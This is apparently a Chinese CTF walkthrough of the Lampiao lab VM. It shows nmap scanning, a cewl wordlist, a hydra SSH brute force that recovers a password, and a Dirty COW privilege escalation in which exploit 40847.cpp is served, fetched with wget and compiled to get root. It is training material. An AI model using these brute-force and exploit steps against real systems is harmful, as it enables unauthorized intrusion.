Lampiao 靶机练习
文章目录
- 第1次 Lampiao靶机练习
- kali扫描
- netdiscover扫描
- namp扫描
- 第1次扫描
- 第2次扫描
- 御剑扫描
- 打开扫描到的文件
- 打开登录网站
- sql注入
- 链接跳转
- node/1
- node/3
- node/2
- kali操作
- 利用cewl获取网站信息
- hydra对用户密码进行爆破
- ssh进行登录
- 查看靶机信息:
- 提权
- 利用脏牛提权
- 开启临时服务器
- 对40847文件的操作
- 查找40847.cpp文件
- 拷贝40847.cpp文件
- tiago用户下载40847.cpp文件
- 对40847.cpp文件进行编译:
- 找到flag.txt文件
- 找到flag.txt文件
第1次 Lampiao靶机练习
kali扫描
netdiscover扫描
安装好靶机之后,有个账户密码登录,但我们并不知道账户和密码,所以我们用kali进行扫描其ip地址
用命令进行扫描
netdiscover
得到IP地址:
192.168.81.139
namp扫描
命令如下:
第1次扫描
发现了2个端口,22和80
nmap -T4 -A -v 192.168.81.139
连接密码:
ssh-hostkey:
| 1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
| 2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
| 256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_ 256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
第2次扫描
发现了3个端口,22、80和1898
nmap -p- -A -sV 192.168.81.139
御剑扫描
扫描1898端口出来了信息
http://192.168.81.139:1898
扫描的信息如下
http://192.168.81.139:1898/robots.txt
http://192.168.81.139:1898/includes/
http://192.168.81.139:1898/misc/
http://192.168.81.139:1898/index.php
http://192.168.81.139:1898/install.php
打开扫描到的文件
http://192.168.81.139:1898/robots.txt
可以看到下面文件中包含很多信息,并且含有路径信息,可以看到有一个更新日志文件
Disallow: /CHANGELOG.txt
打开这个文件
http://192.168.81.139:1898/CHANGELOG.txt
robots.txt文件内容
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.htmlUser-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
打开登录网站
直接加端口号就进入了这个网站
http://192.168.81.139:1898/
sql注入
未能成功
1'
链接跳转
发现两处可以跳转
node/1
跳转后的网址如下:
http://192.168.81.139:1898/?q=node/1
node/3
http://192.168.81.139:1898/?q=node/3
发现有一个音频文件和一句话:Node 2 is not working
打开音频文件
并未有任何有用的信息
http://192.168.81.139:1898/LuizGonzaga-LampiaoFalou.mp3
node/2
把node/3,改为node/2
得到一个音频文件和一个图片
http://192.168.81.139:1898/?q=node/2
audio.m4a
qrc.png
打开音频文件
http://192.168.81.139:1898/audio.m4a
打开图片
http://192.168.81.139:1898/qrc.png
发效了一个二维码
扫描之后,发现信息如下:
Try harder!muahuahua
kali操作
利用cewl获取网站信息
利用cewl获取网站关键信息从而生成一个密码字典:
cewl http://192.168.81.139:1898 -w lampiao.txt
hydra对用户密码进行爆破
利用hydra对用户tiago密码进行爆破:
hydra -l tiago -P lampiao.txt 192.168.81.139 ssh
得到账户密码:
login: tiago
password: Virgulino
ssh进行登录
利用ssh进行登录:
ssh tiago@192.168.81.139
根据提示输入
yes
Virgulino (这个就是密码)
查看靶机信息:
uname -a
提权
利用脏牛提权
用Kali 自带的漏洞搜索有无能进行脏牛提权的shell:
searchsploit dirty
开启临时服务器
- 将40847.cpp文件复制到当前目录下
- 并且利用 python2 -m SimpleHTTPServer 1234
- 开启临时的建议服务器
注意事项:
- 因此使用Python2时要特别注明,
- 如果没安装Python3则不用特殊注明,
- Python3无法利用该方法开启简易服务器,
- 另外,开启服务器后默认的访问目录
- 为当前开启服务器的目录,
- 即我在 ~/桌面 这个目录下,
- 则在浏览器中访问的话则默认能看 ~/桌面 目录下的文件。
- 另外,开启服务器后默认的访问目录
对40847文件的操作
查找40847.cpp文件
find / -name 40847.cpp
拷贝40847.cpp文件
把文件复制到要定义的服务目录下
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/xxb1/
使用下面命令时,要在
/home/xxb1/ 目录下使用
python2 -m SimpleHTTPServer 1234
tiago用户下载40847.cpp文件
在刚才ssh登录的tiago用户的/tmp目录下下载40847.cpp文件:
wget http://192.168.81.131:1234/40847.cpp
#ip地址改为自己的kali的IP
对40847.cpp文件进行编译:
g++ -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil./40847 #这个是-o 后面的那个名字,可自定义
解释:
- -O2 :表示编译器的优化选项,
- -std=c++11:表示按照c++ 2011标准来编译,
- -pthread :是指利用到多线程时需要用到的库(我也不知道为啥要加上这个参数,希望评论区有大神能指出)
- -o name :中name表示生成的文件的名字
获取到了root的密码:
dirtyCowFun
再利用ssh登录:
ssh root@192.168.81.139
发现登陆后已经是root了
找到flag.txt文件
内容如下:
9740616875908d91ddcdaa8aea3af366
:表示编译器的优化选项,
- -std=c++11:表示按照c++ 2011标准来编译,
- -pthread :是指利用到多线程时需要用到的库(我也不知道为啥要加上这个参数,希望评论区有大神能指出)
- -o name :中name表示生成的文件的名字
[外链图片转存中…(img-qiIdpB4i-1646028456448)]
获取到了root的密码:
dirtyCowFun
再利用ssh登录:
ssh root@192.168.81.139
发现登陆后已经是root了
[外链图片转存中…(img-txiHzLqu-1646028456449)]
找到flag.txt文件
内容如下:
9740616875908d91ddcdaa8aea3af366
[外链图片转存中…(img-GUX9hqmc-1646028456449)]
Lampiao 靶机练习相关推荐
- Lampiao靶机渗透测试
文章目录 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.查看对方web服务 2.使用 msfconsole get shell 脏牛提权漏洞(CVE-2016-5191) 三.脏牛提权 ...
- lampiao靶机实验实战演练
一.明确目标 探测主机存活情况 靶机 ip : 192.168.119.155 Kali ip :192.168.119.129 二.信息搜集 Nmap 进行常规端口开放扫描 开放了22 ssh 8 ...
- VulnHub系列之Lampiao渗透测试
Lampiao 靶机下载:https://www.vulnhub.com/entry/lampiao-1,249/ 信息收集 首先是ip信息 然后是服务器端口服务等信息 访问80端口 扫描80端口网站 ...
- 【vulnhub】Lampiao渗透实战(脏牛提权)
总结 1.该靶机的WEB系统的建站CMS是drupal 7,时刻关注一些cms漏洞 2.在没有思路的时候,try yourself !往往有不同的收获 3.再练练脏牛提权... Lampiao靶机百度 ...
- DAY29(DAY30拓展):Vulnhub--靶机实战
DAY29:vulnhub 靶机实战 1.vulnhub(DC-1 靶机) 打开靶机 扫描存活主机确定 DC-1 的ip地址,使用 nmap nmap -sS 网段 nmap -sP 192.168. ...
- 挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】
靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:中等 工具:kalilinux: 一个灵活的脑子 : 一双手 目标:得到root权限&am ...
- 3.100个渗透测试实战#3(Lampiao)
目录 一.实验环境 二.实验流程 三.实验步骤 (一)信息收集--主机发现 1.查看kali的网卡和IP信息:(网卡名:eht0:IP:192.168.97.129) 2.查看靶机页面: 3.探测特定 ...
- [VulnHub靶机]Lampiao_脏牛提权
文章目录 环境介绍 实验步骤 1. 扫描端口 2. 信息收集 3. ssh爆破 4. drupal 7 漏洞getshell 5. 脏牛提权 环境介绍 攻击机:kali(192.168.56.104) ...
- Vulnhub靶场篇:Lampiao 夜车星繁的博客
因为本透明水平看来还没达到手撕vulnhub的级别,所以这些靶场都是参考的前辈们的文章一步步来的,由于作者水平有限所以写的博客会"雷厉风行"走的是一步到位相对更简单的渗透路线,尽量 ...
最新文章
- android h5 多图上传源码,JS移动端/H5同时选择多张图片上传并使用canvas压缩图片...
- 求合体电脑版_SCP CB 电脑移植版测评
- 在 Mac OSX 版的 LispBox 环境上安装配置 SBCL 详细过程
- mysql 导出函数_mysql导出存储过程或函数
- 【XAudio2】3.关键概念
- 通过Blazor使用C#开发SPA单页面应用程序(4) - Ant Design
- Navicat中无法自定义标量值函数的问题
- docker可以把应用及其相关的_声学中的相干性及其相关应用!
- Ren获得Zcash技术咨询委员会资助,将在币安智能链上启动RenZEC流动性引导计划
- [USACO07FEB]银牛派对Silver Cow Party
- 蓝桥杯 ALGO-89 算法训练 字符删除
- “文艺复兴” ConvNet卷土重来,压过Transformer!FAIR重新设计纯卷积新架构
- [学习日记] 文件读写 FileStream
- 各版本delphi下载
- java生成pdf表格_java生成pdf文件 --- Table
- ROS | 机器人操作系统简介
- hysys动态模拟教程_(转载)HYSYS-过程模拟软件-稳态模拟-第一部分(一)
- Cocos2d-x制作《单机斗地主》源码解剖5:玩家的出牌
- 软件的静态测试和动态测试【软件测试分类】
- Unity3D教程(一)安装以及使用Unity3D
热门文章
- Improved Disease Classification in Chest X-Rays with Transferred Features from Report Generation论文解读
- OLED显示图片的技能,你Get了吗?
- 求和!李姐万岁!用ChatGPT写GitBook布局锤子便签配色的WordPress主题
- 基于python实现FPS(最远距离采样)
- zookeeper单机服务器启动流程
- 这可能是简易的机器学习入门(小白必读)
- 电商扣减库存_严选库存中心性能优化
- 流式双染凋亡率的计算_Annexin V-FITC/PI双染细胞凋亡检测方法
- uni-app学习日记5
- 产能、产量、销量、销售额、价格及市场份额-全球与中国市场公用空气净化消毒器